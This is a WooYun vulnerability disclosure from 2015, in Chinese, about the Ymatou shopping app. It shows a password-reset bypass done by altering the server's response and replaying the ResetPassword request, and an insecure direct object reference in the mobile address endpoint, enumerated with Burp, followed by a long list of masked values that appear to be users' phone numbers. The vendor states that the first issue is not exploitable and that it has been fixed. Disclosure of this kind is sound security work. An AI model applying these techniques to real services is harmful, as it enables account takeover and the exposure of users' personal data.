乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-14: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经确认,细节仅向厂商公开 2015-08-28: 细节向核心白帽子及相关领域专家公开 2015-09-07: 细节向普通白帽子公开 2015-09-17: 细节向实习白帽子公开 2015-10-02: 细节向公众公开
用户密码重置+越权
app忘记密码
下一步
随便输入验证码,抓包
修改response为
HTTP/1.1 200 OKDate: Thu, 13 Aug 2015 13:09:55 GMTCache-Control: no-cachePragma: no-cacheContent-Type: application/json; charset=utf-8Expires: -1Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETContent-Length: 77X-Via: 1.1 suqian6:88 (Cdn Cache Server V2.0), 1.1 zb84:0 (Cdn Cache Server V2.0)Connection: keep-alive{"Code":201,"BCode":0,"Msg":"éªè¯ç åºéé误","Data":null,"Trace":null}
来到最后一步!
输入新密码确定,抓包!
POST /api/user/ResetPassword?DeviceToken=866654022667924&AppName=YmatouApp&ClientId=f807cd651293ca092df4c86f9ba01c4f&agent=ymtapp&ClientType=2 HTTP/1.1Content-Type: application/jsonContent-Length: 60Host: api.app.ymatou.comConnection: Keep-AliveUser-Agent: 01Android4.4.2=866654022667924=================================================1.2.0=myApp===========ymtapp{"Code":"§1111§","Phone":"15******99","Password":"wooyun123"}
重置成功===========================越权。wap版
http://m.ymatou.com/useraddress/get?id=941336
遍历idburp跑一下,标记后四位
*****93716586**********93716586**********89924518**********89924518**********77304106**********43111792**********34824980**********30593982**********30275293**********30275293**********30275293**********30275293**********16560668**********16560668**********16560668**********16560668**********16560668**********16518680**********10848187**********10071514**********05976767**********73493801**********31646218**********11004714**********54263090**********17766324**********17109234**********00861961**********98081617**********88911110**********87161731**********81831225**********80897488**********78888580**********77121885**********77108470**********72320022**********61423370**********61079688**********57521566**********57144049**********53158314**********42962339**********30157237**********28094509**********23659616**********22591938**********22039855**********21998733**********21817176**********18268149**********16997207**********16800162**********16027588**********11390191**********11301334**********11298382**********11223018**********11223018**********11223018**********11223018**********11223016**********11223016**********11223016**********11223016**********11223016**********11068129**********09509424**********09509424**********07148599**********06288366**********06239933**********04644570**********02469551**********01784725**********01764437**********01633343**********01287170**********01188528**********00619681**********00094824**********00085570**********23169077**********11877905**********05232007**********03113729**********02890987**********01694570**********8500054**********59507036**********26192192**********10809668**********21180710**********12345200**********68891321**********68891321**********15678040**********01811012**********18643621**********18557515**********14739199**********03645001**********91703121**********85767808**********71059491**********61738198**********61153238**********58625771**********58625771**********52885793**********35865279**********22712680**********22097626**********22097626**********22041616**********21982063**********21411661**********09111172**********09111172**********05266733**********05266733**********05266733**********00422262**********95500202**********95330083**********82072117**********80475878**********80475878**********58267191**********50177145**********10986060**********09269647**********06322840**********71862800**********71861900**********71861900**********21109695**********90365650**********41910369**********10572586**********98890906**********91242733**********91242733**********87654187**********80974281**********79207657**********79207657**********79207657**********78684116**********72729885**********61705034**********52398197**********51817090**********29086190**********27339158**********25215927**********24686632**********22771787**********21077090**********18255768**********18226478**********18172757**********18116812**********18080366**********18077216**********17719100**********17492109**********17453643**********16755110**********16653506**********16535588**********15795108**********15795108**********13875128**********13553673**********13212252**********12280049**********12280049**********12280049**********11796205**********11552736**********10922726**********10902564**********10818406**********10818406**********10711384**********10337989**********09986279**********06199612**********01807921**********01202578**********01202578**********01148062**********01059143**********99339830**********99339830**********95896845**********80767375**********68119079**********61788392**********51642730**********38878721**********25066035**********24466139**********22279576**********3820818**********19210883**********18700194**********18426198**********18136947**********17860660**********17598320**********17589826**********3817121**********16906026**********16450815**********16229918**********11087011**********10939689**********10699126**********10663623**********10321453**********10273323**********10168866**********08327080**********07888521**********02449220**********02040123**********01682326**********01390925**********01028307**********98980369**********95326636**********95326636**********95101696**********77082602**********76668808**********71770598********** 13769**********64417849**********64208869**********64041984**********61431763**********61381372**********61330079**********28633289**********18521727**********09372510**********09372510**********09283138**********03020804**********01608645**********01393217**********01393217**********01393217**********01111279**********91594426**********88416188**********81088406**********81088406**********80359592**********75372997**********71787733**********71538376**********51970406**********51662628**********41772070**********41772070**********41628021**********41142742**********37420232**********37420232**********36532545**********32602175**********30049449**********23336414**********23336414**********21341746**********21219988**********21128001**********21128001**********11696219**********08085834**********05436525**********01731977**********01731977**********01731977**********01679368**********01679368**********89454874**********87097686**********82559666**********82559666**********82559666**********82559666**********70508173**********67481485**********63220931**********47857608**********47857608**********47857608**********47857608**********26616618**********26616618**********26607640**********24693994**********24693994**********24138859**********24081319**********12495969**********10407970**********09059533**********07758408**********03085130**********01259279**********01196912**********82253262**********72419299**********66527609**********63296630**********56008765**********01177479**********88681390**********41598670**********33386085**********16588438**********11392018**********01971096**********01971096**********01971096**********01971096**********76813537**********64279880**********61862239**********46200888**********10182563**********01802911**********67266380**********04510821**********04510821**********85007198**********72166232**********03541986**********-5820310**********-5820310*****
由于burp不能显示汉字啊,付几张图看看
危害等级:高
漏洞Rank:16
确认时间:2015-08-18 00:46
感谢。问题1实际上无法绕过。且为了避免可能的风险,已做处理。
暂无